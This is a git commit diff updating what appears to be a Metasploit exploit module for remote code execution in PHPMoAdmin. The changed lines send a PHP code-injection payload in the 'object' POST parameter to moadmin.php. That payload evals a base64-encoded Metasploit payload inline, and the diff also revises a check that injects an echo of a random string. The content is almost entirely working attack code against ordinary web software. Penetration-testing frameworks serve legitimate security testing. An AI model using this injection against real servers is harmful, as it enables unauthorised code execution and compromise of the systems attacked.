Update phpmoadmin_exec.rb

Changes: "Check if vulnerable" code improvement; Payload delivery code improvement; Minor indent issues. Thanks for your feedback guys :)
2015-03-05 12:46:53 +00:00 · 2015-03-05 12:46:53 +00:00 · 95962aab0d
parent 9530e15c81
commit 95962aab0d
1 changed files with 7 additions and 9 deletions
--- a/modules/exploits/multi/http/phpmoadmin_exec.rb
+++ b/modules/exploits/multi/http/phpmoadmin_exec.rb
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
-      'Arch' => ARCH_PHP,
+      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'PHPMoAdmin', { }  ],
@ -44,16 +44,17 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def check
+    testrun = Rex::Text::rand_text_alpha(10)
    res = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.to_s,'moadmin.php'),
+      'uri'       => normalize_uri(target_uri,'moadmin.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
-        'object'	=> '1;phpinfo();exit',
+        'object'	=> "1;echo '#{testrun}';exit",
      }
    })

-    if res and res.body.match(/Build Date/)
+    if res and res.body.include?(testrun)
      return Exploit::CheckCode::Vulnerable
    end

@ -65,14 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
    print_status("Executing payload...")

    res = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.to_s,'moadmin.php'),
+      'uri'       => normalize_uri(target_uri,'moadmin.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
-        'object'  => "1;eval(base64_decode($_SERVER[HTTP_CMD]));exit"
-      },
-      'headers' => {
-        'Cmd' => Rex::Text.encode_base64(payload.encoded)
+        'object'  => "1;eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
      }
    })